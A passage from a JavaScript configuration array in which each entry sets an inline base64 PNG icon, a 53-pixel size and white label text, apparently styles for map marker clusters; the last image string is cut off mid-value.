url: 'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADUAAAA1CAYAAADh5qNwAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyppVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuNi1jMTMyIDc5LjE1OTI4NCwgMjAxNi8wNC8xOS0xMzoxMzo0MCAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENDIDIwMTUuNSAoTWFjaW50b3NoKSIgeG1wTU06SW5zdGFuY2VJRD0ieG1wLmlpZDo1QzFBQ0JGREEwNzQxMUU3ODk0RUFCOTlGQUI3QUM5NiIgeG1wTU06RG9jdW1lbnRJRD0ieG1wLmRpZDo1QzFBQ0JGRUEwNzQxMUU3ODk0RUFCOTlGQUI3QUM5NiI+IDx4bXBNTTpEZXJpdmVkRnJvbSBzdFJlZjppbnN0YW5jZUlEPSJ4bXAuaWlkOjVDMUFDQkZCQTA3NDExRTc4OTRFQUI5OUZBQjdBQzk2IiBzdFJlZjpkb2N1bWVudElEPSJ4bXAuZGlkOjVDMUFDQkZDQTA3NDExRTc4OTRFQUI5OUZBQjdBQzk2Ii8+IDwvcmRmOkRlc2NyaXB0aW9uPiA8L3JkZjpSREY+IDwveDp4bXBtZXRhPiA8P3hwYWNrZXQgZW5kPSJyIj8+R2qhJAAABbJJREFUeNrcWl9sU1UY/9asywZr1wHrNsPixsaUyZaJTAFBiCRmgQThhRcHuAcMiZrIg39efPLB6IP6gCbwgsY/jzJNJJKh6YQxAooLMAWGYQbi2o7o1nV2aZvO71dO9dzT03brvaXXfckvdzv33u/8fqfnft/5VzI3N0eLzUog6q0TnywaQW/uOUClFvuEvycYTzHWMloZDzCWMqoYU4wZxh+MG4wRxiBjiBG1koRZczCeZhxgPMtwZXm2SgBC10vl04yvGOgy3zMSZgmZaZB9jKuMfkZPDkHZzCXe7xf+9ptpcO2Lxz+7mfWl3p6WLXz5SHQxq22N+MVeZbzIXH7IwcVc92MH5Xx5j3EIQUb3zN+ROI37IxQIztJUKEqhUIzi8QRFYwkqczqotNRBbreTqtxlVOstp/q6ClpSoaWBBvNxnUf5epjFzVr+TbHzRr6cYHSq9xKJObr1e5hGb4bIH4xQpiwBYQCE+wMRuj46RSXcNLXeCmptdlNTYyU5HIa2KhENuIHr38PCxiwTxQ47+PIto169N/pbiIav/EXhcCyvvoYGgEDg0uU/qbO9mlazQMXQkOeYRzcLu2w6ULCjR/kyoAoKTcfom1N36OxQMG9BqsEP/MEv/CuG+geYT7spUeygmS+nGB65HF3t65O3KTgxS4Uw+IX/W2Nh9RZ4nGReTXmJ4heX8OVLRo1cPnJtknxn/BSLJaiQBv++s34a+XVSvbWS0Sf4LfiXep/RYRDEFVz48e59HfZc+OkuXU0X1iH4zV8U
t8J2vhxUuxwqKIZd5HpRv2IHBc95iUJEPCLnIeSawfPBog5UUT/ynhLuj+giuE7U84yH5YIzQ4GCf0Pz+cYQGRUDz95covD/62oeKlSUyycqgo9ir6k6VFEYbbfIIwUkVjvZMCdo8JIMfLdnE7XfEBw4T1iVWK2y8Excl7/2ZRLlZOyWb95I/6ltYRpeuwX/NFFd8nwIg84AD07taOAFfsp8rEsnapv8FKYPdl2TAS/wU2yrTlSbGmnsbBjVK/aITpQhN01ORm0tanIqqstZaaIa5CembRb1dFFQsTqdqGp1lmpn04xwXJlCeraX7C7KrRNl6G9Op8PWojT8pnWiDOOhsv+fqJBO1G1DB6102lpU5dK0GYdfJ+q6YTHAU2ZrUZ6qNH7XdKJG5Ce8NeW2FlVXW6EW/aIT5ZOfwMqpnU3Dz6cTdVGOIFgKtuuvBV7KUnVY8NeG9D75yYdWV9lSlIZXn5yS1Lj4qfzPqsZKXZQpetQDr2y8VVHfMf7dx8FifWfHMluJAh9lEwF8T2cThbHHO3IBFuvt8m3VrCjXbR68S8rOo27Y8LEc82GbN3qLPmxC/Vs2eXW56bhaqGOKMf1LmGCmCrBB9uQGb1FFoX7wkCfAjJcF35yisD2Kb+uoXNb0YCV1rVtRFEHr1y1P1q/YMeZ5Wvd8tj51mPGzXLC2zUNdj91fYaivva1aLQavVzK9k1GU2GPdy5gwCFvjoW2b68hZWthvDP5RD+pT7A54ZdsDzsqMX0S47MaSgKErcp7YtbOBapYXJirC764dDcl61KUJxg7Bi/ISJYRdonvLT+OGaabLSTu7VyYjo1UJGn7gD36xg68Y6t/KfK7k8jMvNtg87u1p2UTK7jx21pE3mptcyaVgrJwGggtbL0zuztdUUGuLdnc+ZcMMa3fnhbAxFraR//yA8QJJ+1cg0rzKlUTyHMV4hAIT/52jiMUTyTUF5BqnfI6Ck3p9fcZzFKmwfQxBoSDnKKTgcYjFfcHXD0lz4gUEUwJNGuZ3OPEysNAXzRyNQ4M8x3iDlIVQk4YZ+NuMz3WJNZfhaJyZuIwK0RpY7n1GkAjn6WtGvA8/bcJvPF9iVoQtDCb7BRCyHqf0836IzW6x4gPhqfN+mIKfp3tn/ixbvLd6shQTBAeLOU4sWYxnaP8RYAArBAM3cLcJyQAAAABJRU5ErkJggg==',
height: 53,
width: 53,
textSize: '20',
textColor: '#fff'
},
{
url: 'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADUAAAA1CAYAAADh5qNwAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyppVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuNi1jMTMyIDc5LjE1OTI4NCwgMjAxNi8wNC8xOS0xMzoxMzo0MCAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENDIDIwMTUuNSAoTWFjaW50b3NoKSIgeG1wTU06SW5zdGFuY2VJRD0ieG1wLmlpZDo1QzFBQ0JGREEwNzQxMUU3ODk0RUFCOTlGQUI3QUM5NiIgeG1wTU06RG9jdW1lbnRJRD0ieG1wLmRpZDo1QzFBQ0JGRUEwNzQxMUU3ODk0RUFCOTlGQUI3QUM5NiI+IDx4bXBNTTpEZXJpdmVkRnJvbSBzdFJlZjppbnN0YW5jZUlEPSJ4bXAuaWlkOjVDMUFDQkZCQTA3NDExRTc4OTRFQUI5OUZBQjdBQzk2IiBzdFJlZjpkb2N1bWVudElEPSJ4bXAuZGlkOjVDMUFDQkZDQTA3NDExRTc4OTRFQUI5OUZBQjdBQzk2Ii8+IDwvcmRmOkRlc2NyaXB0aW9uPiA8L3JkZjpSREY+IDwveDp4bXBtZXRhPiA8P3hwYWNrZXQgZW5kPSJyIj8+R2qhJAAABbJJREFUeNrcWl9sU1UY/9asywZr1wHrNsPixsaUyZaJTAFBiCRmgQThhRcHuAcMiZrIg39efPLB6IP6gCbwgsY/jzJNJJKh6YQxAooLMAWGYQbi2o7o1nV2aZvO71dO9dzT03brvaXXfckvdzv33u/8fqfnft/5VzI3N0eLzUog6q0TnywaQW/uOUClFvuEvycYTzHWMloZDzCWMqoYU4wZxh+MG4wRxiBjiBG1koRZczCeZhxgPMtwZXm2SgBC10vl04yvGOgy3zMSZgmZaZB9jKuMfkZPDkHZzCXe7xf+9ptpcO2Lxz+7mfWl3p6WLXz5SHQxq22N+MVeZbzIXH7IwcVc92MH5Xx5j3EIQUb3zN+ROI37IxQIztJUKEqhUIzi8QRFYwkqczqotNRBbreTqtxlVOstp/q6ClpSoaWBBvNxnUf5epjFzVr+TbHzRr6cYHSq9xKJObr1e5hGb4bIH4xQpiwBYQCE+wMRuj46RSXcNLXeCmptdlNTYyU5HIa2KhENuIHr38PCxiwTxQ47+PIto169N/pbiIav/EXhcCyvvoYGgEDg0uU/qbO9mlazQMXQkOeYRzcLu2w6ULCjR/kyoAoKTcfom1N36OxQMG9BqsEP/MEv/CuG+geYT7spUeygmS+nGB65HF3t65O3KTgxS4Uw+IX/W2Nh9RZ4nGReTXmJ4heX8OVLRo1cPnJtknxn/BSLJaiQBv++s34a+XVSvbWS0Sf4LfiXep/RYRDEFVz48e59HfZc+OkuXU0X1iH4zV8U
t8J2vhxUuxwqKIZd5HpRv2IHBc95iUJEPCLnIeSawfPBog5UUT/ynhLuj+giuE7U84yH5YIzQ4GCf0Pz+cYQGRUDz95covD/62oeKlSUyycqgo9ir6k6VFEYbbfIIwUkVjvZMCdo8JIMfLdnE7XfEBw4T1iVWK2y8Excl7/2ZRLlZOyWb95I/6ltYRpeuwX/NFFd8nwIg84AD07taOAFfsp8rEsnapv8FKYPdl2TAS/wU2yrTlSbGmnsbBjVK/aITpQhN01ORm0tanIqqstZaaIa5CembRb1dFFQsTqdqGp1lmpn04xwXJlCeraX7C7KrRNl6G9Op8PWojT8pnWiDOOhsv+fqJBO1G1DB6102lpU5dK0GYdfJ+q6YTHAU2ZrUZ6qNH7XdKJG5Ce8NeW2FlVXW6EW/aIT5ZOfwMqpnU3Dz6cTdVGOIFgKtuuvBV7KUnVY8NeG9D75yYdWV9lSlIZXn5yS1Lj4qfzPqsZKXZQpetQDr2y8VVHfMf7dx8FifWfHMluJAh9lEwF8T2cThbHHO3IBFuvt8m3VrCjXbR68S8rOo27Y8LEc82GbN3qLPmxC/Vs2eXW56bhaqGOKMf1LmGCmCrBB9uQGb1FFoX7wkCfAjJcF35yisD2Kb+uoXNb0YCV1rVtRFEHr1y1P1q/YMeZ5Wvd8tj51mPGzXLC2zUNdj91fYaivva1aLQavVzK9k1GU2GPdy5gwCFvjoW2b68hZWthvDP5RD+pT7A54ZdsDzsqMX0S47MaSgKErcp7YtbOBapYXJirC764dDcl61KUJxg7Bi/ISJYRdonvLT+OGaabLSTu7VyYjo1UJGn7gD36xg68Y6t/KfK7k8jMvNtg87u1p2UTK7jx21pE3mptcyaVgrJwGggtbL0zuztdUUGuLdnc+ZcMMa3fnhbAxFraR//yA8QJJ+1cg0rzKlUTyHMV4hAIT/52jiMUTyTUF5BqnfI6Ck3p9fcZzFKmwfQxBoSDnKKTgcYjFfcHXD0lz4gUEUwJNGuZ3OPEysNAXzRyNQ4M8x3iDlIVQk4YZ+NuMz3WJNZfhaJyZuIwK0RpY7n1GkAjn6WtGvA8/bcJvPF9iVoQtDCb7BRCyHqf0836IzW6x4gPhqfN+mIKfp3tn/ixbvLd6shQTBAeLOU4sWYxnaP8RYAArBAM3cLcJyQAAAABJRU5ErkJggg==',
height: 53,
width: 53,
textSize: '20',
textColor: '#fff'
},
{
url: 'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADUAAAA1CAYAAADh5qNwAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyppVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuNi1jMTMyIDc5LjE1OTI4NCwgMjAxNi8wNC8xOS0xMzoxMzo0MCAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENDIDIwMTUuNSAoTWFjaW50b3NoKSIgeG1wTU06SW5zdGFuY2VJRD0ieG1wLmlpZDo1QzFBQ0JGREEwNzQxMUU3ODk0RUFCOTlGQUI3QUM5NiIgeG1wTU06RG9jdW1lbnRJRD0ieG1wLmRpZDo1QzFBQ0JGRUEwNzQxMUU3ODk0RUFCOTlGQUI3QUM5NiI+IDx4bXBNTTpEZXJpdmVkRnJvbSBzdFJlZjppbnN0YW5jZUlEPSJ4bXAuaWlkOjVDMUFDQkZCQTA3NDExRTc4OTRFQUI5OUZBQjdBQzk2IiBzdFJlZjpkb2N1bWVudElEPSJ4bXAuZGlkOjVDMUFDQkZDQTA3NDExRTc4OTRFQUI5OUZBQjdBQzk2Ii8+IDwvcmRmOkRlc2NyaXB0aW9uPiA8L3JkZjpSREY+IDwveDp4bXBtZXRhPiA8P3hwYWNrZXQgZW5kPSJyIj8+R2qhJAAABbJJREFUeNrcWl9sU1UY/9asywZr1wHrNsPixsaUyZaJTAFBiCRmgQThhRcHuAcMiZrIg39efPLB6IP6gCbwgsY/jzJNJJKh6YQxAooLMAWGYQbi2o7o1nV2aZvO71dO9dzT03brvaXXfckvdzv33u/8fqfnft/5VzI3N0eLzUog6q0TnywaQW/uOUClFvuEvycYTzHWMloZDzCWMqoYU4wZxh+MG4wRxiBjiBG1koRZczCeZhxgPMtwZXm2SgBC10vl04yvGOgy3zMSZgmZaZB9jKuMfkZPDkHZzCXe7xf+9ptpcO2Lxz+7mfWl3p6WLXz5SHQxq22N+MVeZbzIXH7IwcVc92MH5Xx5j3EIQUb3zN+ROI37IxQIztJUKEqhUIzi8QRFYwkqczqotNRBbreTqtxlVOstp/q6ClpSoaWBBvNxnUf5epjFzVr+TbHzRr6cYHSq9xKJObr1e5hGb4bIH4xQpiwBYQCE+wMRuj46RSXcNLXeCmptdlNTYyU5HIa2KhENuIHr38PCxiwTxQ47+PIto169N/pbiIav/EXhcCyvvoYGgEDg0uU/qbO9mlazQMXQkOeYRzcLu2w6ULCjR/kyoAoKTcfom1N36OxQMG9BqsEP/MEv/CuG+geYT7spUeygmS+nGB65HF3t65O3KTgxS4Uw+IX/W2Nh9RZ4nGReTXmJ4heX8OVLRo1cPnJtknxn/BSLJaiQBv++s34a+XVSvbWS0Sf4LfiXep/RYRDEFVz48e59HfZc+OkuXU0X1iH4zV8U
t8J2vhxUuxwqKIZd5HpRv2IHBc95iUJEPCLnIeSawfPBog5UUT/ynhLuj+giuE7U84yH5YIzQ4GCf0Pz+cYQGRUDz95covD/62oeKlSUyycqgo9ir6k6VFEYbbfIIwUkVjvZMCdo8JIMfLdnE7XfEBw4T1iVWK2y8Excl7/2ZRLlZOyWb95I/6ltYRpeuwX/NFFd8nwIg84AD07taOAFfsp8rEsnapv8FKYPdl2TAS/wU2yrTlSbGmnsbBjVK/aITpQhN01ORm0tanIqqstZaaIa5CembRb1dFFQsTqdqGp1lmpn04xwXJlCeraX7C7KrRNl6G9Op8PWojT8pnWiDOOhsv+fqJBO1G1DB6102lpU5dK0GYdfJ+q6YTHAU2ZrUZ6qNH7XdKJG5Ce8NeW2FlVXW6EW/aIT5ZOfwMqpnU3Dz6cTdVGOIFgKtuuvBV7KUnVY8NeG9D75yYdWV9lSlIZXn5yS1Lj4qfzPqsZKXZQpetQDr2y8VVHfMf7dx8FifWfHMluJAh9lEwF8T2cThbHHO3IBFuvt8m3VrCjXbR68S8rOo27Y8LEc82GbN3qLPmxC/Vs2eXW56bhaqGOKMf1LmGCmCrBB9uQGb1FFoX7wkCfAjJcF35yisD2Kb+uoXNb0YCV1rVtRFEHr1y1P1q/YMeZ5Wvd8tj51mPGzXLC2zUNdj91fYaivva1aLQavVzK9k1GU2GPdy5gwCFvjoW2b68hZWthvDP5RD+pT7A54ZdsDzsqMX0S47MaSgKErcp7YtbOBapYXJirC764dDcl61KUJxg7Bi/ISJYRdonvLT+OGaabLSTu7VyYjo1UJGn7gD36xg68Y6t/KfK7k8jMvNtg87u1p2UTK7jx21pE3mptcyaVgrJwGggtbL0zuztdUUGuLdnc+ZcMMa3fnhbAxFraR//yA8QJJ+1cg0rzKlUTyHMV4hAIT/52jiMUTyTUF5BqnfI6Ck3p9fcZzFKmwfQxBoSDnKKTgcYjFfcHXD0lz4gUEUwJNGuZ3OPEysNAXzRyNQ4M8x3iDlIVQk4YZ+NuMz3WJNZfhaJyZuIwK0RpY7n1GkAjn6WtGvA8/bcJvPF9iVoQtDCb7BRCyHqf0836IzW6x4gPhqfN+mIKfp3tn/ixbvLd6shQTBAeLOU4sWYxnaP8RYAArBAM3cLcJyQAAAABJRU5ErkJggg==',
height: 53,
width: 53,
textSize: '20',
textColor: '#fff'
},
{
url: 'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADUAAAA1CAYAAADh5qNwAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyppVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuNi1jMTMyIDc5LjE1OTI4NCwgMjAxNi8wNC8xOS0xMzoxMzo0MCAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENDIDIwMTUuNSAoTWFjaW50b3NoKSIgeG1wTU06SW5zdGFuY2VJRD0ieG1wLmlpZDo1QzFBQ0JGREEwNzQxMUU3ODk0RUFCOTlGQUI3QUM5NiIgeG1wTU06RG9jdW1lbnRJRD0ieG1wLmRpZDo1QzFBQ0JGRUEwNzQxMUU3ODk0RUFCOTlGQUI3QUM5NiI+IDx4bXBNTTpEZXJpdmVkRnJvbSBzdFJlZjppbnN0YW5jZUlEPSJ4bXAuaWlkOjVDMUFDQkZCQTA3NDExRTc4OTRFQUI5OUZBQjdBQzk2IiBzdFJlZjpkb2N1bWVudElEPSJ4bXAuZGlkOjVDMUFDQkZDQTA3NDExRTc4OTRFQUI5OUZBQjdBQzk2Ii8+IDwvcmRmOkRlc2NyaXB0aW9uPiA8L3JkZjpSREY+IDwveDp4bXBtZXRhPiA8P3hwYWNrZXQgZW5kPSJyIj8+R2qhJAAABbJJREFUeNrcWl9sU1UY/9asywZr1wHrNsPixsaUyZaJTAFBiCRmgQThhRcHuAcMiZrIg39efPLB6IP6gCbwgsY/jzJNJJKh6YQxAooLMAWGYQbi2o7o1nV2aZvO71dO9dzT03brvaXXfckvdzv33u/8fqfnft/5VzI3N0eLzUog6q0TnywaQW/uOUClFvuEvycYTzHWMloZDzCWMqoYU4wZxh+MG4wRxiBjiBG1koRZczCeZhxgPMtwZXm2SgBC10vl04yvGOgy3zMSZgmZaZB9jKuMfkZPDkHZzCXe7xf+9ptpcO2Lxz+7mfWl3p6WLXz5SHQxq22N+MVeZbzIXH7IwcVc92MH5Xx5j3EIQUb3zN+ROI37IxQIztJUKEqhUIzi8QRFYwkqczqotNRBbreTqtxlVOstp/q6ClpSoaWBBvNxnUf5epjFzVr+TbHzRr6cYHSq9xKJObr1e5hGb4bIH4xQpiwBYQCE+wMRuj46RSXcNLXeCmptdlNTYyU5HIa2KhENuIHr38PCxiwTxQ47+PIto169N/pbiIav/EXhcCyvvoYGgEDg0uU/qbO9mlazQMXQkOeYRzcLu2w6ULCjR/kyoAoKTcfom1N36OxQMG9BqsEP/MEv/CuG+geYT7spUeygmS+nGB65HF3t65O3KTgxS4Uw+IX/W2Nh9RZ4nGReTXmJ4heX8OVLRo1cPnJtknxn/BSLJaiQBv++s34a+XVSvbWS0Sf4LfiXep/RYRDEFVz48e59HfZc+OkuXU0X1iH4zV8U
t8J2vhxUuxwqKIZd5HpRv2IHBc95iUJEPCLnIeSawfPBog5UUT/ynhLuj+giuE7U84yH5YIzQ4GCf0Pz+cYQGRUDz95covD/62oeKlSUyycqgo9ir6k6VFEYbbfIIwUkVjvZMCdo8JIMfLdnE7XfEBw4T1iVWK2y8Excl7/2ZRLlZOyWb95I/6ltYRpeuwX/NFFd8nwIg84AD07taOAFfsp8rEsnapv8FKYPdl2TAS/wU2yrTlSbGmnsbBjVK/aITpQhN01ORm0tanIqqstZaaIa5CembRb1dFFQsTqdqGp1lmpn04xwXJlCeraX7C7KrRNl6G9Op8PWojT8pnWiDOOhsv+fqJBO1G1DB6102lpU5dK0GYdfJ+q6YTHAU2ZrUZ6qNH7XdKJG5Ce8NeW2FlVXW6EW/aIT5ZOfwMqpnU3Dz6cTdVGOIFgKtuuvBV7KUnVY8NeG9D75yYdWV9lSlIZXn5yS1Lj4qfzPqsZKXZQpetQDr2y8VVHfMf7dx8FifWfHMluJAh9lEwF8T2cThbHHO3IBFuvt8m3VrCjXbR68S8rOo27Y8LEc82GbN3qLPmxC/Vs2eXW56bhaqGOKMf1LmGCmCrBB9uQGb1FFoX7wkCfAjJcF35yisD2Kb+uoXNb0YCV1rVtRFEHr1y1P1q/YMeZ5Wvd8tj51mPGzXLC2zUNdj91fYaivva1aLQavVzK9k1GU2GPdy5gwCFvjoW2b68hZWthvDP5RD+pT7A54ZdsDzsqMX0S47MaSgKErcp7YtbOBapYXJirC764dDcl61KUJxg7Bi/ISJYRdonvLT+OGaabLSTu7VyYjo1UJGn7gD36xg68Y6t/KfK7k8jMvNtg87u1p2UTK7jx21pE3mptcyaVgrJwGggtbL0zuztdUUGuLdnc+ZcMMa3fnhbAxFraR//yA8QJJ+1cg0rzKlUTyHMV4hAIT/52jiMUTyTUF5BqnfI6Ck3p9fcZzFKmwfQxBoSDnKKTgcYjFfcHXD0lz4gUEUwJNGuZ3OPEysNAXzRyNQ4M8x3iDlIVQk4YZ+NuMz3WJNZfhaJyZuIwK0RpY7n1GkAjn6WtGvA8/bcJvPF9iVoQtDCb7BRCyHqf0836IzW6x4gPhqfN+mIKfp3tn/ixbvLd6shQTBAeLOU4sWYxnaP8RYAArBAM3cLcJyQAAAABJRU5ErkJggg==',
height: 53,
width: 53,
textSize: '20',
textColor: '#fff'
},
{
url: 'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADUAAAA1CAYAAADh5qNwAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyppVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuNi1jMTMyIDc5LjE1OTI4NCwgMjAxNi8wNC8xOS0xMzoxMzo0MCAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENDIDIwMTUuNSAoTWFjaW50b3NoKSIgeG1wTU06SW5zdGFuY2VJRD0ieG1wLmlpZDo1QzFBQ0JGREEwNzQxMUU3ODk0RUFCOTlGQUI3QUM5NiIgeG1wTU06RG9jdW1lbnRJRD0ieG1wLmRpZDo1QzFBQ0JGRUEwNzQxMUU3ODk0RUFCOTlGQUI3QUM5NiI+IDx4bXBNTTpEZXJpdmVkRnJvbSBzdFJlZjppbnN0YW5jZUlEPSJ4bXAuaWlkOjVDMUFDQkZCQTA3NDExRTc4OTRFQUI5OUZBQjdBQzk2IiBzdFJlZjpkb2N1bWVudElEPSJ4bXAuZGlkOjVDMUFDQkZDQTA3NDExRTc4OTRFQUI5OUZBQjdBQzk2Ii8+IDwvcmRmOkRlc2NyaXB0aW9uPiA8L3JkZjpSREY+IDwveDp4bXBtZXRhPiA8P3hwYWNrZXQgZW5kPSJyIj8+R2qhJAAABbJJREFUeNrcWl9sU1UY/9asywZr1wHrNsPixsaUyZaJTAFBiCRmgQThhRcHuAcMiZrIg39efPLB6IP6gCbwgsY/jzJNJJKh6YQxAooLMAWGYQbi2o7o1nV2aZvO71dO9dzT03brvaXXfckvdzv33u/8fqfnft/5VzI3N0eLzUog6q0TnywaQW/uOUClFvuEvycYTzHWMloZDzCWMqoYU4wZxh+MG4wRxiBjiBG1koRZczCeZhxgPMtwZXm2SgBC10vl04yvGOgy3zMSZgmZaZB9jKuMfkZPDkHZzCXe7xf+9ptpcO2Lxz+7mfWl3p6WLXz5SHQxq22N+MVeZbzIXH7IwcVc92MH5Xx5j3EIQUb3zN+ROI37IxQIztJUKEqhUIzi8QRFYwkqczqotNRBbreTqtxlVOstp/q6ClpSoaWBBvNxnUf5epjFzVr+TbHzRr6cYHSq9xKJObr1e5hGb4bIH4xQpiwBYQCE+wMRuj46RSXcNLXeCmptdlNTYyU5HIa2KhENuIHr38PCxiwTxQ47+PIto169N/pbiIav/EXhcCyvvoYGgEDg0uU/qbO9mlazQMXQkOeYRzcLu2w6ULCjR/kyoAoKTcfom1N36OxQMG9BqsEP/MEv/CuG+geYT7spUeygmS+nGB65HF3t65O3KTgxS4Uw+IX/W2Nh9RZ4nGReTXmJ4heX8OVLRo1cPnJtknxn/BSLJaiQBv++s34a+XVSvbWS0Sf4LfiXep/RYRDEFVz48e59HfZc+OkuXU0X1iH4zV8U
t8J2vhxUuxwqKIZd5HpRv2IHBc95iUJEPCLnIeSawfPBog5UUT/ynhLuj+giuE7U84yH5YIzQ4GCf0Pz+cYQGRUDz95covD/62oeKlSUyycqgo9ir6k6VFEYbbfIIwUkVjvZMCdo8JIMfLdnE7XfEBw4T1iVWK2y8Excl7/2ZRLlZOyWb95I/6ltYRpeuwX/NFFd8nwIg84AD07taOAFfsp8rEsnapv8FKYPdl2TAS/wU2yrTlSbGmnsbBjVK/aITpQhN01ORm0tanIqqstZaaIa5CembRb1dFFQsTqdqGp1lmpn04xwXJlCeraX7C7KrRNl6G9Op8PWojT8pnWiDOOhsv+fqJBO1G1DB6102lpU5dK0GYdfJ+q6YTHAU2ZrUZ6qNH7XdKJG5Ce8NeW2FlVXW6EW/aIT5ZOfwMqpnU3Dz6cTdVGOIFgKtuuvBV7KUnVY8NeG9D75yYdWV9lSlIZXn5yS1Lj4qfzPqsZKXZQpetQDr2y8VVHfMf7dx8FifWfHMluJAh9lEwF8T2cThbHHO3IBFuvt8m3VrCjXbR68S8rOo27Y8LEc82GbN3qLPmxC/Vs2eXW56bhaqGOKMf1LmGCmCrBB9uQGb1FFoX7wkCfAjJcF35yisD2Kb+uoXNb0YCV1rVtRFEHr1y1P1q/YMeZ5Wvd8tj51mPGzXLC2zUNdj91fYaivva1aLQavVzK9k1GU2GPdy5gwCFvjoW2b68hZWthvDP5RD+pT7A54ZdsDzsqMX0S47MaSgKErcp7YtbOBapYXJirC764dD